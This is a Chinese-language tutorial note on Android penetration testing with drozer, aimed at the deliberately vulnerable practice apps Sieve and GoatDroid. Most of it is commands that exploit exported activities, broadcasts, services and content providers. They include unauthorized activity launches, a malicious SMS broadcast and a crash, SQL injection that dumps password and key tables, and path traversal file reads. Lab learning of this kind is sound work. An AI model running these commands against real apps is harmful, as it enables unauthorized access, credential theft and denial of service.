0x00 安装drozer
windows:
在github下载msi安装文件执行,装在local disk python27下。
pip install protobuf pyOpenSSL Twisted service_identity
下载drozer agent
https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk
adb.exe install drozer-agent.apk
adb.exe install test.apk
开启drozer-agent enable
adb forward tcp:31415 tcp:31415
cd C:\python27\scripts:
drozer console connect
0x01 Activity
PWList的activity设置为了true,有被导出风险。
未授权访问
dz> run app.activity.start –component com.mwr.example.sieve com.mwr.example.sieve.PWList
0x02 Broadcast
receiver的exported未设置,可被利用。
发送恶意广播
run app.broadcast.send –action org.owasp.goatdroid.fourgoats.SOCIAL_SMS –extra string phoneNumber 1234 –extra string message pwnd
dos造成崩溃
run app.broadcast.send –action org.owasp.goatdroid.fourgoats.SOCIAL_SMS
0x03 Service
没设置exported为false,默认可以导出。
启动GPS位置服务。
run app.service.start –action org.owasp.goatdroid.fourgoats.services.LocationService –component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.services.LocationService
0x04 Content
列出可访问内容URI的列表和路径:
SQL注入:
0x05 相关命令
run scanner.provider.finduris -a com.mwr.example.sieve
run app.service.info -a org.owasp.goatdroid.fourgoats
run app.service.start –action org.owasp.goatdroid.fourgoats.services.LocationService –component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.services.LocationService
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
–projection “* FROM SQLITE_MASTER WHERE type=’table’;–”
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
–projection “* FROM Key;–”
run scanner.provider.injection -a com.mwr.example.sieve
run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data
run app.provider.info -a com.mwr.example.sieve
run app.service.send com.mwr.example.sievecom.mwr.example.sieve.AuthService –msg 2354 9234 0 –extra stringcom.mwr.example.sieve.PIN 1234 –bundle-as-obj
run app.provider.querycontent://com.mwr.example.sieve.DBContentProvider/Keys/ –projection “* from Passwords;–”
run scanner.provider.traversal -a com.mwr.example.sieve
0x06 参考资料
https://www.freebuf.com/column/175218.html
https://www.freebuf.com/articles/web/165466.html
https://www.jianshu.com/p/dfa92bab3a55